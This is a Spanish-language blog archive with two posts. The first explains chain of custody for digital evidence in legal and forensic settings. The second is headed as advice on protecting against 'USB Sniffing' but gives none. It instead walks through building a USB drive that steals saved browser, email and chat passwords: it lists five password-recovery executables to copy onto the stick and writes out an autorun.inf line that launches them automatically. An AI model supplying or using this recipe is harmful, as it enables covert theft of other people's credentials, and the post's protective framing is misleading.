Tag Archives: information gathering

Cadena de Custodia en Informática Forense (Parte I)

Anexos.fi1.IlustracionMasterPrimero vamos a arrancar con algunos aspectos legales y técnicos sobre que es una “cadena de custodia”, su importancia y significado dentro de una investigacion policial y judicial y después nos ahondaremos en cuestiones informáticas.

La preservación de la cadena de custodia sobre la prueba indiciaria criminalística, es un objetivo que afecta a la totalidad de los miembros del poder judicial, los operadores del derecho y sus auxiliares directos.

Entre éstos últimos debemos incluir el personal de las Fuerzas de Seguridad, las Policías Judiciales y al conjunto de Peritos Oficiales, de Oficio y Consultores Técnicos o Peritos de Parte.

Por esta razón el establecer mecanismos efectivos, eficientes y eficaces que permitan cumplir con dicha tarea a partir de métodos y procedimientos que aseguren la confiabilidad de la información recolectada, único elemento integrador a proteger en los activos informáticos cuestionados, ya que incluye la confidencialidad, la autenticidad, la integridad y el no repudio de los mismo, es una necesidad imperiosa para asegurar el debido proceso en cualquiera de los fueros judiciales vigentes.

En términos sencillos implica establecer un mecanismo que asegure a quien debe Juzgar, que los elementos probatorios ofrecidos como Prueba Documental Informática, son confiables. Es decir que no han sufrido alteración o adulteración alguna desde su recolección, hecho que implica su uso pertinente como indicios probatorios, en sustento de una determinada argumentación orientada a una pretensión fundada en derecho.

El juez debe poder confiar en dichos elementos digitales, por considerarlos auténticos “testigos mudos”, desde el punto de vista criminalístico clásico y evaluarlos en tal sentido, desde la sana crítica, la prueba tasada o las libres convicciones según sea el caso y la estructura judicial en que se desarrolle el proceso.

Consideramos a la cadena de custodia como un procedimiento controlado que se aplica a los indicios materiales (prueba indiciaria) relacionados con un hecho delictivo o no, desde su localización hasta su valoración por los encargados de administrar justicia y que tiene como fin asegurar la inocuidad y esterilidad técnica en el manejo de los mismos, evitando alteraciones, sustituciones, contaminaciones o destrucciones, hasta su disposición definitiva por orden judicial.

Para asegurar estas acciones es necesario establecer un riguroso y detallado registro, que identifique la evidencia y posesión de la misma, con una razón que indique, lugar, hora, fecha, nombre y dependencia involucrada, en el secuestro, la interacción posterior y su depósito en la sede que corresponda (judicial o no).

Desde la detección, identificación, fijación, recolección, protección, resguardo empaque y traslado de la evidencia en el lugar del hecho real o virtual, hasta la presentación como elemento probatorio, la cadena de custodia debe garantizar que el procedimiento empleado ha sido exitoso, y que la evidencia que se recolectó en la escena, es la misma que se está presentando ante el evaluador y/o decisor.

Subsidiariamente, pero a idéntico tenor, es importante considerar el significado implícito en los indicios recolectados, el valor que van a tener en el proceso de investigación, análisis y argumentación del cual dependen. En dicho marco de referencia es que adquirirán su relevancia y pertinencia, de ahí la necesidad de evitar en lo posible la impugnación de los mismos en razón de errores metodológicos propios de cada disciplina en particular (no son idénticas la cadena de custodia de muestras biológicas que la que se corresponde con armas, o documentos impresos o virtuales). Es por esta razón que existen componentes genéricos y componentes particulares en toda cadena de custodia. Por ejemplo el realizar un acta de secuestro es un elemento genérico, pero el asegurar la integridad de la prueba mediante un digesto (Hash) sobre el archivo secuestrado es un elemento propio de la cadena de custodia en informática forense.

Suele asociarse a la cadena de custodia con el proceso judicial orientado a dilucidar acciones delictivas, sin embargo la misma no se agota en el orden penal. En particular la cadena de custodia informático forense debe preservarse en todas las transacciones virtuales susceptibles de ser valoradas económicamente. Cuando un banco realiza una transferencia de fondos o un consumidor adquiere un producto por medios virtuales (Internet entre otros) requiere de esa operación la misma confiabilidad que puede aportarle la cadena de custodia informático forense, es decir afecta en todo momento a la comunidad virtual y sus actores involucrados.

Al recolectar las pruebas, lo importante es el significado, el valor que va a tener en el proceso de investigación y por medio de la cadena de custodia, este valor va a ser relevante, debido a que no se va a poder impugnar, al haberse acatado el procedimiento.

Para que la prueba documental informática sea tenida por válida y adquiera fuerza probatoria ante el encargado de decidir a partir de la misma, es necesario que la misma sea garantizada respecto de su confiabilidad, evitando suplantaciones, modificaciones, alteraciones, adulteraciones o simplemente su destrucción (algo muy común en la evidencia digital, ya sea mediante borrado o denegación de servicio). Desde su recolección, hasta su disposición final, debe implementarse un procedimiento con soporte teórico científico, metodológico criminalístico, estrictamente técnico y procesalmente adecuado. Si carece de alguno de estos componentes, la prueba documental informática recolectada no habrá alcanzado el valor probatorio pretendido. Este procedimiento se caracteriza por involucrar múltiples actores, los que deben estar profundamente consustanciados de su rol a cumplir dentro del mismo, sus actividades a desarrollar durante la manipulación de la prueba y sus responsabilidades derivadas.

Continue reading

Como protegerse de “USB Sniffing”

Como todos sabemos muy bien los Pendrives o USB Drives los utilizamos para transferir datos y demás. ¿Alguna ves pensaron que su pendrive puede capturar todas la contraseñas y datos importantes de una computadora?. Si la respuesta es no, entonces debemos hacer algo para evitar el robo de datos importantes y contraseñas y USB Sniffing. A continuación le mostramos como un usuario cualquiera (Hacker) puede robar sus datos confidenciales.

Las personas utilizamos diferentes navegadores, diferentes programas de chat, y existe una opción en todos estos programas para “guardar contraseñas”, entonces la próxima vez que querramos acceder no tendremos que introducir la contraseña de nuevo.

Como sabemos MS Windows almacena las contraseñas, incluyendo Yahoo, Hotmail, AOL, etc, por lo que un atacante puede interceptar las contraseñas de su computadora vis USB. La siguiente herramienta puede ser utilizada para realizar esto.

  • MessPass solo se puede utilizar para recuperar contraseñas de la sección actual de usuario en el equipo local, y solo funciona si elegimos la opción “recordar contraseña” en alguno de los programas anteriores (Yahoo, AOL, Windows Messenger, Google Talk, etc). Esta aplicación no sirve para obtener contraseñas de otros usuarios.
  • MailPass es una pequeña herramienta de recuperación de contraseña, que revela las contraseñas y otros detalles de cuentas de clientes de correo electrónico (Outlook Express, Yahoo Mail, GMail Notifier, Thunderbird, etc)
  • IE PassView es una utilidad de administración de contraseñas que revela las contraseñas almacenadas por Internet Explorer (Navegador Web)
  • Protected Storage PassView es una pequeña herramienta que revela las contraseñas almacenadas en la computadora por Internet Explorer, Outlook Express y MSN Explorer.
  • PasswordFox es una pequeña utilidad de recuperación de contraseñas que nos permitirá ver los nombres de usuario y contraseñas almacenadas por el navegador Firefox

Descarga las 5 herramientas, extraerlas y copiar solo los archivos ejecutables (.exe) en el Pendrive USB.

Haz Click  Aquí para descargar un programa y ponerlo en la misma carpeta del Pendrive.

Crear un archivo de block de notas y escribir:

[autorun]

open=eh.exe

y guardarlo como autorun.inf

Ahora el USB Sniffer esta listo para usar.